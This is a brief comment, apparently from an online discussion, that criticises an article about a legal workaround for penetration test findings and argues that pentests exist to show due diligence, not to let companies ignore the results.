This is kind of a neat legal "hack", but it's kinda sad that this could be necessary. Pentests are all about exercising due dillegence, not ignoring it. At least, if a company properly follows through on the response to the findings, which is not always the case. So if you're planning to ignore the results of your next test, read this article.